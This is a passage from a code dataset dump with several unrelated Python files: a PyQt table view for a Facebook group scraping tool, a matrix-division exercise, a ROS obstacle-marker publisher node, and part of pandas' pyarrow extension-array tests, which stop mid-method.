ID IN ({})\".format(self.active_tb, g_type, \",\".join([str(id) for id in self.seleted_id]))\n self.model.setQuery(sql_query)\n self.model.submitAll()\n self.model.setTable(self.active_tb)\n # #refresh table\n self.model.submitAll()\n self.model.select()\n self.refresh_header_size()\n\n def save_database(self):\n sql_query = \"INSERT INTO groups_tita(Group_Link,Group_Name,Category,Numbers,Details,Type) SELECT Group_Link,Group_Name,Category,Numbers,Details,Type FROM {} WHERE ID IN ({}) AND {}.Group_Link NOT IN (SELECT Group_Link FROM 
groups_tita)\".format(self.active_tb, \",\".join([str(id) for id in self.seleted_id]), self.active_tb)\n self.model.setQuery(sql_query)\n if self.model.lastError().isValid():\n logging.error(self.model.lastError().text())\n \n self.model.setQuery(sql_query)\n self.model.submitAll()\n self.model.setTable(self.active_tb)\n # #refresh table\n self.model.submitAll()\n self.model.select() \n self.refresh_header_size() \n def delete_selected_row(self):\n sql_query = \"DELETE FROM {} WHERE ID IN ({})\".format(self.active_tb, \",\".join([str(id) for id in self.seleted_id]))\n\n # for index in sorted(indexes):\n # mapped_index = self.proxy.mapToSource(index)\n # self.model.removeRow(mapped_index.row())\n \n self.model.setQuery(sql_query)\n self.model.submitAll()\n self.model.setTable(self.active_tb)\n # #refresh table\n self.model.submitAll()\n self.model.select()\n self.refresh_header_size()\n\n def scan_groups_by_keyword(self):\n keyword = self.ui.le_key_search.text()\n loop_scan = int(self.ui.number_of_groups.value()/9)\n if not keyword:\n QtWidgets.QMessageBox.critical(None, \"Quét Nhóm\",\"Chọn Từ khoá.\", QtWidgets.QMessageBox.Cancel)\n return\n\n uid = self.ui.cb_uids.currentText()\n self._controller.signals.scan_group_by_keyword.emit(uid, keyword, loop_scan)\n\n def view_posts_table(self):\n self.proxy.clearFilters()\n self.active_tb = 'posts'\n self.model.setTable(self.active_tb)\n status = self.model.select()\n\n # self.proxy = CustomProxyModel()\n self.proxy.setSourceModel(self.model)\n\n self.table_group_view.ui.tableView.setModel(self.proxy)\n self.refresh_header_size()\n\n def show_scan_group_by_keyword(self):\n self.proxy.clearFilters()\n uid = self.ui.cb_uids.currentText()\n self.active_tb = 'groups_' + uid\n self.model.setTable(self.active_tb)\n status = self.model.select()\n\n # self.proxy = CustomProxyModel()\n \n self.proxy.setSourceModel(self.model)\n \n self.table_group_view.ui.tableView.setModel(self.proxy) \n self.refresh_header_size() \n def show_default_group(self):\n self.proxy.clearFilters()\n self.active_tb = 'groups_tita'\n self.model.setTable(self.active_tb)\n status = self.model.select()\n\n # self.proxy = CustomProxyModel()\n \n self.proxy.setSourceModel(self.model)\n\n self.table_group_view.ui.tableView.setModel(self.proxy)\n self.refresh_header_size()\n\n def eventFilter(self,target,event):\n if target == self.ui.cb_uids and event.type() == QtCore.QEvent.MouseButtonPress:\n self.acc_model = QSqlTableModel(self)\n self.acc_model.setQuery('SELECT * FROM accounts')\n self.ui.cb_uids.setModel(self.acc_model)\n self.ui.cb_uids.setModelColumn(1)\n return False\n \n def refresh(self):\n self.proxy.clearFilters()\n self.active_pageid = ''\n self.model.setTable('groups_' + self.active_pageid)\n status = self.model.select()\n\n # self.proxy = QSortFilterProxyModel()\n # self.proxy = CustomProxyModel()\n \n self.proxy.setSourceModel(self.model)\n\n self.table_group_view.ui.tableView.setModel(self.proxy)\n\n # self.proxy_model.setFilterFixedString('Dep')\n # self.proxy_model.setFilterKeyColumn(4)\n\n def on_init(self):\n # index = self.ui.cb_pages.model().index(self.ui.cb_pages.currentIndex(),3)\n # self.activeUID = self.ui.cb_pages.model().data(index)\n\n # page_index = self.ui.cb_pages.model().index(self.ui.cb_pages.currentIndex(),1)\n # self.active_pageid = self.ui.cb_pages.model().data(page_index)\n\n self.proxy = CustomProxyModel()\n self.refresh()\n\n\n def on_view_horizontalHeader_sectionClicked(self, logicalIndex):\n self.logicalIndex = logicalIndex\n #disable 
specific column menu\n if self.active_tb == 'posts':\n if self.logicalIndex not in [1,4]:\n return\n elif self.active_tb == 'groups_tita':\n if self.logicalIndex not in [3,6,7,11]:\n return\n else:\n if self.logicalIndex not in [3,6,7]:\n return\n\n\n self.menuValues = QtWidgets.QMenu(self)\n self.signalMapper = QtCore.QSignalMapper(self)\n # self.comboBox.blockSignals(True)\n # self.comboBox.setCurrentIndex(self.logicalIndex)\n # self.comboBox.blockSignals(True)\n\n valuesUnique = set([self.model.index(i, logicalIndex).data() for i in range(self.model.rowCount())])\n\n actionAll = QtGui.QAction(\"All\", self)\n actionAll.triggered.connect(self.on_actionAll_triggered)\n self.menuValues.addAction(actionAll)\n self.menuValues.addSeparator()\n for actionNumber, actionName in enumerate(sorted(list(set(valuesUnique)))):\n action = QtGui.QAction(actionName, self)\n self.signalMapper.setMapping(action, actionNumber)\n action.triggered.connect(self.signalMapper.map)\n self.menuValues.addAction(action)\n self.signalMapper.mappedInt.connect(self.on_signalMapper_mapped)\n headerPos = self.table_group_view.ui.tableView.mapToGlobal(self.horizontalHeader.pos())\n posY = headerPos.y() + self.horizontalHeader.height()\n posX = headerPos.x() + self.horizontalHeader.sectionPosition(self.logicalIndex)\n\n self.menuValues.exec_(QtCore.QPoint(posX, posY))\n\n def on_actionAll_triggered(self):\n filterColumn = self.logicalIndex\n self.proxy.setFilter(\"\", filterColumn)\n\n header_label = self.model.record().fieldName(self.logicalIndex)\n self.model.setHeaderData(self.logicalIndex,QtCore.Qt.Horizontal, header_label)\n\n def on_signalMapper_mapped(self, i):\n stringAction = self.signalMapper.mapping(i).text()\n filterColumn = self.logicalIndex\n self.proxy.setFilter(stringAction, filterColumn)\n\n\n header_label = self.model.record().fieldName(self.logicalIndex) + ': ' + stringAction\n self.model.setHeaderData(self.logicalIndex,QtCore.Qt.Horizontal, header_label)\n\n def on_lineEdit_textChanged(self, text):\n self.proxy.setFilter(text, self.proxy.filterKeyColumn())\n\n def on_comboBox_currentIndexChanged(self, index):\n self.proxy.setFilterKeyColumn(index)\n\n\n def refresh_header_size(self):\n # self.horizontalHeader.setSectionResizeMode(1, QHeaderView.ResizeMode.ResizeToContents)\n self.table_group_view.ui.tableView.resizeColumnsToContents()\n if self.active_tb == 'groups_tita':\n self.table_group_view.ui.tableView.setColumnWidth(1,50)\n self.table_group_view.ui.tableView.setColumnWidth(2,200)\n self.table_group_view.ui.tableView.setColumnWidth(5,100)\n elif self.active_tb == ('groups_' + self.ui.cb_uids.currentText()):\n self.table_group_view.ui.tableView.setColumnWidth(1,100)\n self.table_group_view.ui.tableView.setColumnWidth(5,150)\n elif self.active_tb == 'posts': \n self.table_group_view.ui.tableView.setColumnWidth(2,100)\n","repo_name":"wolfwarriorvn/FacebookScrape","sub_path":"views/group_view.py","file_name":"group_view.py","file_ext":"py","file_size_in_byte":16565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74630473708","text":"#!/usr/bin/python3\n\"\"\"Scalar matrix division\"\"\"\n\n\ndef matrix_divided(matrix, div):\n \"\"\"Divides all elements of matrix by div\n\n Args:\n matrix (list): list of lists of integers or floats\n div (int, float): divisor (must not be 0)\n\n Returns:\n list: new matrix after division\n \"\"\"\n if not isinstance(matrix, list) or\\\n not all(isinstance(row, list) for row in matrix) or\\\n len(matrix) == 
0:\n        raise TypeError(\"matrix must be a matrix (list of lists) of integers/floats\")\n\n    row_len = len(matrix[0])\n    if not all(len(row) == row_len for row in matrix):\n        raise TypeError(\"Each row of the matrix must have the same size\")\n\n    if type(div) not in (int, float):\n        raise TypeError(\"div must be a number\")\n\n    rmatrix = []\n    for row in matrix:\n        rrow = []\n        for elem in row:\n            if type(elem) not in (int, float):\n                raise TypeError(\"matrix must be a matrix (list of lists) of integers/floats\")\n            rrow.append(round(elem/div, 2))\n        rmatrix.append(rrow[:])\n\n    return rmatrix\n","repo_name":"utukJ/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"44844598078","text":"#!/usr/bin/env python\n\nimport rospy\nimport threading\nimport sensor_msgs.point_cloud2\n\nfrom sensor_msgs.msg import PointCloud2\nfrom nav_msgs.msg import OccupancyGrid, Odometry\nfrom EnvClassifier import GroupingTraker\nfrom datetime import datetime\nfrom visualization_msgs.msg import MarkerArray, Marker\nfrom geometry_msgs.msg import Polygon\nfrom EnvClassifier.ShapeOperator.ClustersToPointCloud2Converter import ClustersToPointCloud2\n\n\nclass PubBlock:\n    def __init__(self, thread_handle, event_handle, sub_func, callback_func=None):\n        self.thread_handle = thread_handle\n        self.event_handle = event_handle\n        self.sub_func = sub_func\n        self.callback_func = callback_func\n        self.data = None\n\n    def acquire_data(self):\n        self.data = self.sub_func()\n        if self.data is None:\n            return False\n        return True\n\n    def update_data(self):\n        if self.callback_func is not None:\n            self.data = self.callback_func(self.data)\n        self.event_handle.clear()\n        self.thread_handle.data = self.data\n        self.event_handle.set()\n        rospy.loginfo(\"Pub \" + self.thread_handle.thread_name)\n\n\nclass SubThread(threading.Thread):\n    def __init__(self, thread_name=\"SubThread\", duration=60.0):\n        super(SubThread, self).__init__(name=thread_name)\n        self.thread_name = thread_name\n        self.duration = duration\n        self._pub_blocks = {}\n\n    def register_thread_CB(self, pub_block):\n        self._pub_blocks[pub_block.thread_handle.thread_name] = pub_block\n\n    def run(self):\n        rospy.loginfo(\"Start sub thread: \" + self.thread_name)\n        while not rospy.is_shutdown():\n            for pub_block in self._pub_blocks.values():\n                if not pub_block.thread_handle.is_alive():\n                    pub_block.thread_handle.start()\n                if pub_block.acquire_data():\n                    pub_block.update_data()\n                else:\n                    continue\n            # Sleep every interval\n            rospy.sleep(self.duration)\n\n\nclass Distributer:\n    def __init__(self, publisher, call_back):\n        self.publisher = publisher\n        self.call_back = call_back\n\n    def deal_and_pub(self, data):\n        res = self.call_back(data)\n        if isinstance(res, MarkerArray):\n            for mark in res.markers:  # MarkerArray stores its Markers in the .markers field\n                mark.action = Marker.DELETE\n            self.publisher.publish(res)\n            for mark in res.markers:\n                mark.action = Marker.ADD\n            self.publisher.publish(res)\n\n\nclass PubThread(threading.Thread):\n    def __init__(self, thread_name, pub_event, pub_rate=3):\n        super(PubThread, self).__init__(name=thread_name)\n        self.thread_name = thread_name\n        self.data = None\n        self.pub_event = pub_event\n        self.pub_rate = pub_rate\n        self.distributers = []\n\n    def register_distributer(self, distributer):\n        self.distributers.append(distributer)\n\n    def run(self):\n        rospy.loginfo(\"Start pub thread: \" + self.thread_name)\n        while not 
rospy.is_shutdown():\n while self.pub_event.is_set():\n if rospy.is_shutdown():\n break\n if self.data is not None: # (env, lcs, mcs)\n # rospy.loginfo(\"Pub \" + self.thread_name)\n for distributer in self.distributers:\n distributer.deal_and_pub(self.data)\n rospy.sleep(10.0)\n else:\n rospy.loginfo(\"Nothing to Pub \" + self.thread_name)\n\n\ndef pc2_grid_sub_func():\n # Get point data\n global group_tracker\n data = rospy.wait_for_message('/filtered_point_cloud_centers', PointCloud2, timeout=None)\n laser_grid = rospy.wait_for_message('/map', OccupancyGrid, timeout=None)\n point_cloud2 = sensor_msgs.point_cloud2.read_points(data)\n points = [[i[0], i[1], i[2]] for i in point_cloud2]\n # Generate points and marks\n if points is not None and len(points) > 0:\n return group_tracker.getEnv(points, laser_grid)\n else:\n rospy.loginfo(\"No enough points for classification\")\n return None\n\ndef get_marker_array_callback(data):\n rospy.loginfo(\"Updating obstacle infos.\")\n return data[0].generateInfoMarkers()\n\ndef get_polygon_array_callback(data):\n rospy.loginfo(\"Updating obstacle polygons.\")\n return data[0].generateShapeMarkers()\n\ndef get_transparent_obstacle_callback(data):\n rospy.loginfo(\"Updating transparent obstacles.\")\n return data[0].generateTransparentObstacleMarkers()\n\ndef get_clustered_mmwave_pointcloud2_callback(data):\n rospy.loginfo(\"Updating clustered transparent mmwave clusters.\")\n mcs = data[2]\n return ClustersToPointCloud2(mcs)\n\n\nif __name__ == '__main__':\n # Pub components\n marker_array_pub = rospy.Publisher(\"/class_marker\", MarkerArray, queue_size=1)\n polygon_array_pub = rospy.Publisher(\"/polygon_marker\", MarkerArray, queue_size=100)\n transparent_obstacle_pub = rospy.Publisher(\"/transparent_obstacle\", Polygon, queue_size=1)\n # clustered_mmwave_pub = rospy.Publisher(\"/clustered_mmwave\", PointCloud2, queue_size=1)\n\n marker_distributer = Distributer(marker_array_pub, get_marker_array_callback)\n polygon_distributer = Distributer(polygon_array_pub, get_polygon_array_callback)\n transparent_obstacle_distributer = Distributer(transparent_obstacle_pub, get_transparent_obstacle_callback)\n # clustered_mmwave_distributer = Distributer(clustered_mmwave_pub, get_clustered_mmwave_pointcloud2_callback)\n\n pub_event = threading.Event()\n pub_thread = PubThread(\"PubMarkerArray\", pub_event)\n pub_thread.register_distributer(marker_distributer)\n pub_thread.register_distributer(polygon_distributer)\n pub_thread.register_distributer(transparent_obstacle_distributer)\n # pub_thread.register_distributer(clustered_mmwave_distributer)\n marker_pub_block = PubBlock(pub_thread, pub_event, pc2_grid_sub_func)\n\n pc2_sub_thread = SubThread(\"SubPC2\", duration=10.0)\n pc2_sub_thread.register_thread_CB(marker_pub_block)\n try:\n rospy.init_node('map_classifier', anonymous=True)\n group_tracker = GroupingTraker.GroupingTracker()\n pc2_sub_thread.start()\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"908941087/mmwave_radar_indoor_false","sub_path":"ti_ws/src/py_interface/scripts/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":6340,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4118035898","text":"\"\"\"\nThis file contains a minimal set of tests for compliance with the extension\narray interface test suite, and should contain no other tests.\nThe test suite for the full 
functionality of the array is located in\n`pandas/tests/arrays/`.\nThe tests in this file are inherited from the BaseExtensionTests, and only\nminimal tweaks should be applied to get the tests passing (by overwriting a\nparent method).\nAdditional tests should either be added to one of the BaseExtensionTests\nclasses (if they are relevant for the extension interface for all dtypes), or\nbe added to the array-specific tests in `pandas/tests/arrays/`.\n\"\"\"\nfrom datetime import (\n date,\n datetime,\n time,\n timedelta,\n)\nfrom io import (\n BytesIO,\n StringIO,\n)\nimport pickle\n\nimport numpy as np\nimport pytest\n\nfrom pandas.compat import (\n is_ci_environment,\n is_platform_windows,\n pa_version_under6p0,\n pa_version_under7p0,\n pa_version_under8p0,\n pa_version_under9p0,\n)\nfrom pandas.errors import PerformanceWarning\n\nimport pandas as pd\nimport pandas._testing as tm\nfrom pandas.api.types import is_bool_dtype\nfrom pandas.tests.extension import base\n\npa = pytest.importorskip(\"pyarrow\", minversion=\"1.0.1\")\n\nfrom pandas.core.arrays.arrow.array import ArrowExtensionArray\n\nfrom pandas.core.arrays.arrow.dtype import ArrowDtype # isort:skip\n\npytestmark = pytest.mark.filterwarnings(\n \"ignore:.* may decrease performance. Upgrade to pyarrow >=7 to possibly\"\n)\n\n\n@pytest.fixture(params=tm.ALL_PYARROW_DTYPES, ids=str)\ndef dtype(request):\n return ArrowDtype(pyarrow_dtype=request.param)\n\n\n@pytest.fixture\ndef data(dtype):\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n data = [True, False] * 4 + [None] + [True, False] * 44 + [None] + [True, False]\n elif pa.types.is_floating(pa_dtype):\n data = [1.0, 0.0] * 4 + [None] + [-2.0, -1.0] * 44 + [None] + [0.5, 99.5]\n elif pa.types.is_signed_integer(pa_dtype):\n data = [1, 0] * 4 + [None] + [-2, -1] * 44 + [None] + [1, 99]\n elif pa.types.is_unsigned_integer(pa_dtype):\n data = [1, 0] * 4 + [None] + [2, 1] * 44 + [None] + [1, 99]\n elif pa.types.is_date(pa_dtype):\n data = (\n [date(2022, 1, 1), date(1999, 12, 31)] * 4\n + [None]\n + [date(2022, 1, 1), date(2022, 1, 1)] * 44\n + [None]\n + [date(1999, 12, 31), date(1999, 12, 31)]\n )\n elif pa.types.is_timestamp(pa_dtype):\n data = (\n [datetime(2020, 1, 1, 1, 1, 1, 1), datetime(1999, 1, 1, 1, 1, 1, 1)] * 4\n + [None]\n + [datetime(2020, 1, 1, 1), datetime(1999, 1, 1, 1)] * 44\n + [None]\n + [datetime(2020, 1, 1), datetime(1999, 1, 1)]\n )\n elif pa.types.is_duration(pa_dtype):\n data = (\n [timedelta(1), timedelta(1, 1)] * 4\n + [None]\n + [timedelta(-1), timedelta(0)] * 44\n + [None]\n + [timedelta(-10), timedelta(10)]\n )\n elif pa.types.is_time(pa_dtype):\n data = (\n [time(12, 0), time(0, 12)] * 4\n + [None]\n + [time(0, 0), time(1, 1)] * 44\n + [None]\n + [time(0, 5), time(5, 0)]\n )\n elif pa.types.is_string(pa_dtype):\n data = [\"a\", \"b\"] * 4 + [None] + [\"1\", \"2\"] * 44 + [None] + [\"!\", \">\"]\n elif pa.types.is_binary(pa_dtype):\n data = [b\"a\", b\"b\"] * 4 + [None] + [b\"1\", b\"2\"] * 44 + [None] + [b\"!\", b\">\"]\n else:\n raise NotImplementedError\n return pd.array(data, dtype=dtype)\n\n\n@pytest.fixture\ndef data_missing(data):\n \"\"\"Length-2 array with [NA, Valid]\"\"\"\n return type(data)._from_sequence([None, data[0]])\n\n\n@pytest.fixture(params=[\"data\", \"data_missing\"])\ndef all_data(request, data, data_missing):\n \"\"\"Parametrized fixture returning 'data' or 'data_missing' integer arrays.\n\n Used to test dtype conversion with and without missing values.\n \"\"\"\n if request.param == \"data\":\n return data\n 
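# A test that takes `all_data` therefore runs twice: once with the full\n    # 100-element array and once with the length-2 [NA, valid] pair.\n    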
elif request.param == \"data_missing\":\n return data_missing\n\n\n@pytest.fixture\ndef data_for_grouping(dtype):\n \"\"\"\n Data for factorization, grouping, and unique tests.\n\n Expected to be like [B, B, NA, NA, A, A, B, C]\n\n Where A < B < C and NA is missing\n \"\"\"\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n A = False\n B = True\n C = True\n elif pa.types.is_floating(pa_dtype):\n A = -1.1\n B = 0.0\n C = 1.1\n elif pa.types.is_signed_integer(pa_dtype):\n A = -1\n B = 0\n C = 1\n elif pa.types.is_unsigned_integer(pa_dtype):\n A = 0\n B = 1\n C = 10\n elif pa.types.is_date(pa_dtype):\n A = date(1999, 12, 31)\n B = date(2010, 1, 1)\n C = date(2022, 1, 1)\n elif pa.types.is_timestamp(pa_dtype):\n A = datetime(1999, 1, 1, 1, 1, 1, 1)\n B = datetime(2020, 1, 1)\n C = datetime(2020, 1, 1, 1)\n elif pa.types.is_duration(pa_dtype):\n A = timedelta(-1)\n B = timedelta(0)\n C = timedelta(1, 4)\n elif pa.types.is_time(pa_dtype):\n A = time(0, 0)\n B = time(0, 12)\n C = time(12, 12)\n elif pa.types.is_string(pa_dtype):\n A = \"a\"\n B = \"b\"\n C = \"c\"\n elif pa.types.is_binary(pa_dtype):\n A = b\"a\"\n B = b\"b\"\n C = b\"c\"\n else:\n raise NotImplementedError\n return pd.array([B, B, None, None, A, A, B, C], dtype=dtype)\n\n\n@pytest.fixture\ndef data_for_sorting(data_for_grouping):\n \"\"\"\n Length-3 array with a known sort order.\n\n This should be three items [B, C, A] with\n A < B < C\n \"\"\"\n return type(data_for_grouping)._from_sequence(\n [data_for_grouping[0], data_for_grouping[7], data_for_grouping[4]]\n )\n\n\n@pytest.fixture\ndef data_missing_for_sorting(data_for_grouping):\n \"\"\"\n Length-3 array with a known sort order.\n\n This should be three items [B, NA, A] with\n A < B and NA missing.\n \"\"\"\n return type(data_for_grouping)._from_sequence(\n [data_for_grouping[0], data_for_grouping[2], data_for_grouping[4]]\n )\n\n\n@pytest.fixture\ndef data_for_twos(data):\n \"\"\"Length-100 array in which all the elements are two.\"\"\"\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype):\n return pd.array([2] * 100, dtype=data.dtype)\n # tests will be xfailed where 2 is not a valid scalar for pa_dtype\n return data\n\n\n@pytest.fixture\ndef na_value():\n \"\"\"The scalar missing value for this type. 
Default 'None'\"\"\"\n return pd.NA\n\n\nclass TestBaseCasting(base.BaseCastingTests):\n def test_astype_str(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_binary(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"For {pa_dtype} .astype(str) decodes.\",\n )\n )\n super().test_astype_str(data)\n\n\nclass TestConstructors(base.BaseConstructorsTests):\n def test_from_dtype(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if (pa.types.is_timestamp(pa_dtype) and pa_dtype.tz) or pa.types.is_string(\n pa_dtype\n ):\n if pa.types.is_string(pa_dtype):\n reason = \"ArrowDtype(pa.string()) != StringDtype('pyarrow')\"\n else:\n reason = f\"pyarrow.type_for_alias cannot infer {pa_dtype}\"\n request.node.add_marker(\n pytest.mark.xfail(\n reason=reason,\n )\n )\n super().test_from_dtype(data)\n\n def test_from_sequence_pa_array(self, data, request):\n # https://github.com/pandas-dev/pandas/pull/47034#discussion_r955500784\n # data._data = pa.ChunkedArray\n result = type(data)._from_sequence(data._data)\n tm.assert_extension_array_equal(result, data)\n assert isinstance(result._data, pa.ChunkedArray)\n\n result = type(data)._from_sequence(data._data.combine_chunks())\n tm.assert_extension_array_equal(result, data)\n assert isinstance(result._data, pa.ChunkedArray)\n\n def test_from_sequence_pa_array_notimplemented(self, request):\n if pa_version_under6p0:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=AttributeError,\n reason=\"month_day_nano_interval not implemented by pyarrow.\",\n )\n )\n with pytest.raises(NotImplementedError, match=\"Converting strings to\"):\n ArrowExtensionArray._from_sequence_of_strings(\n [\"12-1\"], dtype=pa.month_day_nano_interval()\n )\n\n def test_from_sequence_of_strings_pa_array(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_time64(pa_dtype) and pa_dtype.equals(\"time64[ns]\"):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=\"Nanosecond time parsing not supported.\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support parsing {pa_dtype}\",\n )\n )\n elif pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=\"Iterating over ChunkedArray[bool] returns PyArrow scalars.\",\n )\n )\n elif pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n if pa_version_under7p0:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support string cast from {pa_dtype}\",\n )\n )\n elif is_platform_windows() and is_ci_environment():\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=(\n \"TODO: Set ARROW_TIMEZONE_DATABASE environment variable \"\n \"on CI to path to the tzdata for pyarrow.\"\n ),\n )\n )\n elif pa_version_under6p0 and pa.types.is_temporal(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support string cast from {pa_dtype}\",\n )\n )\n pa_array = data._data.cast(pa.string())\n result = type(data)._from_sequence_of_strings(pa_array, dtype=data.dtype)\n tm.assert_extension_array_equal(result, data)\n\n pa_array = pa_array.combine_chunks()\n result = type(data)._from_sequence_of_strings(pa_array, dtype=data.dtype)\n tm.assert_extension_array_equal(result, data)\n\n\nclass TestGetitemTests(base.BaseGetitemTests):\n @pytest.mark.xfail(\n reason=(\n 
\"data.dtype.type return pyarrow.DataType \"\n \"but this (intentionally) returns \"\n \"Python scalars or pd.NA\"\n )\n )\n def test_getitem_scalar(self, data):\n super().test_getitem_scalar(data)\n\n\nclass TestBaseNumericReduce(base.BaseNumericReduceTests):\n def check_reduce(self, ser, op_name, skipna):\n pa_dtype = ser.dtype.pyarrow_dtype\n result = getattr(ser, op_name)(skipna=skipna)\n if pa.types.is_boolean(pa_dtype):\n # Can't convert if ser contains NA\n pytest.skip(\n \"pandas boolean data with NA does not fully support all reductions\"\n )\n elif pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype):\n ser = ser.astype(\"Float64\")\n expected = getattr(ser, op_name)(skipna=skipna)\n tm.assert_almost_equal(result, expected)\n\n @pytest.mark.parametrize(\"skipna\", [True, False])\n def test_reduce_series(self, data, all_numeric_reductions, skipna, request):\n pa_dtype = data.dtype.pyarrow_dtype\n xfail_mark = pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_numeric_reductions} is not implemented in \"\n f\"pyarrow={pa.__version__} for {pa_dtype}\"\n ),\n )\n if all_numeric_reductions in {\"skew\", \"kurt\"}:\n request.node.add_marker(xfail_mark)\n elif (\n all_numeric_reductions in {\"median\", \"var\", \"std\", \"prod\", \"max\", \"min\"}\n and pa_version_under6p0\n ):\n request.node.add_marker(xfail_mark)\n elif (\n all_numeric_reductions in {\"sum\", \"mean\"}\n and skipna is False\n and pa_version_under6p0\n and (pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype))\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=AssertionError,\n reason=(\n f\"{all_numeric_reductions} with skip_nulls={skipna} did not \"\n f\"return NA for {pa_dtype} with pyarrow={pa.__version__}\"\n ),\n )\n )\n elif not (\n pa.types.is_integer(pa_dtype)\n or pa.types.is_floating(pa_dtype)\n or pa.types.is_boolean(pa_dtype)\n ) and not (\n all_numeric_reductions in {\"min\", \"max\"}\n and (\n (pa.types.is_temporal(pa_dtype) and not pa.types.is_duration(pa_dtype))\n or pa.types.is_string(pa_dtype)\n or pa.types.is_binary(pa_dtype)\n )\n ):\n request.node.add_marker(xfail_mark)\n elif pa.types.is_boolean(pa_dtype) and all_numeric_reductions in {\n \"std\",\n \"var\",\n \"median\",\n }:\n request.node.add_marker(xfail_mark)\n super().test_reduce_series(data, all_numeric_reductions, skipna)\n\n\nclass TestBaseBooleanReduce(base.BaseBooleanReduceTests):\n @pytest.mark.parametrize(\"skipna\", [True, False])\n def test_reduce_series(\n self, data, all_boolean_reductions, skipna, na_value, request\n ):\n pa_dtype = data.dtype.pyarrow_dtype\n xfail_mark = pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_boolean_reductions} is not implemented in \"\n f\"pyarrow={pa.__version__} for {pa_dtype}\"\n ),\n )\n if not pa.types.is_boolean(pa_dtype):\n request.node.add_marker(xfail_mark)\n op_name = all_boolean_reductions\n s = pd.Series(data)\n result = getattr(s, op_name)(skipna=skipna)\n assert result is (op_name == \"any\")\n\n\nclass TestBaseGroupby(base.BaseGroupbyTests):\n def test_groupby_agg_extension(self, data_for_grouping, request):\n super().test_groupby_agg_extension(data_for_grouping)\n\n def test_groupby_extension_no_sort(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n 
raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support factorizing {pa_dtype}\",\n )\n )\n super().test_groupby_extension_no_sort(data_for_grouping)\n\n def test_groupby_extension_transform(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support factorizing {pa_dtype}\",\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_groupby_extension_transform(data_for_grouping)\n\n def test_groupby_extension_apply(\n self, data_for_grouping, groupby_apply_op, request\n ):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support factorizing {pa_dtype}\",\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_groupby_extension_apply(data_for_grouping, groupby_apply_op)\n\n def test_in_numeric_groupby(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=\"ArrowExtensionArray doesn't support .sum() yet.\",\n )\n )\n super().test_in_numeric_groupby(data_for_grouping)\n\n @pytest.mark.filterwarnings(\n \"ignore:The default value of numeric_only:FutureWarning\"\n )\n @pytest.mark.parametrize(\"as_index\", [True, False])\n def test_groupby_extension_agg(self, as_index, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=ValueError,\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support factorizing {pa_dtype}\",\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n 